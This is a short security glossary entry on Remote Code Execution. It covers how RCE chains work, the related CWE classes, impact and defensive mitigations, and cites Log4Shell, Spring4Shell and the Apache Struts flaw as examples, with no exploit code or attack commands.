RCE (Remote Code Execution)
RCE is any vulnerability that lets a remote attacker run arbitrary code on the target system.
Definition
Remote Code Execution (RCE) is the umbrella term for any vulnerability that allows an attacker to make a target system execute code of the attacker's choosing without physical access. RCE is not itself a bug pattern — it is the outcome that ties a long list of underlying bug classes together: memory corruption (buffer overflow, use-after-free), deserialisation, command injection, template injection, file-upload-to-execute, JNDI / IL gadget chains, and many more.
RCE is the maximum severity any application bug can reach. A vulnerability scored "RCE" lets the attacker drop the rest of the kill chain at will — persistence, credential theft, lateral movement — limited only by the privileges of the process that took the input.
How it works
Every RCE is a chain. The "vulnerability" is the entry point that lets attacker-chosen bytes influence the program counter, the interpreter, or the shell. Modern exploit chains compose multiple primitives: a deserialisation gadget that calls a method, that method invokes a JNDI lookup, the JNDI lookup fetches a remote class, the remote class runs a static initialiser, the static initialiser shells out. Log4Shell is the textbook composed-RCE of the last decade.
The relevant CWE depends on the underlying bug. RCE is often classified under CWE-94 (Code Injection) at a high level, but the more specific CWE — CWE-502 for deserialisation, CWE-78 for command injection, CWE-787 for out-of-bounds write — is the editorially correct one.
Impact
Total compromise of the affected host: arbitrary file read/write, credential theft, persistence, malware deployment, ransomware staging. Pre-authentication, network-reachable RCE is the highest-priority class of patch for any defender — KEV adds these on first signal of in-the-wild exploitation.
Mitigation
RCE mitigation depends on the underlying bug class. Generic defences include least-privilege execution (run the affected service as a low-privileged user, in a sandbox, in a container with `--cap-drop=ALL`), defence in depth (egress filtering blocks the exploit's second-stage payload fetch), and aggressive patching — vendors typically publish RCE fixes as out-of-cycle releases. EDR products often catch the post-exploitation stage even when the initial primitive lands.
Examples
- CVE-2021-44228 (Log4Shell) — JNDI-driven RCE in Apache Log4j2.
- CVE-2022-22965 (Spring4Shell) — RCE in Spring Framework's data-binder.
- CVE-2017-5638 (Apache Struts) — OGNL injection RCE behind the Equifax breach.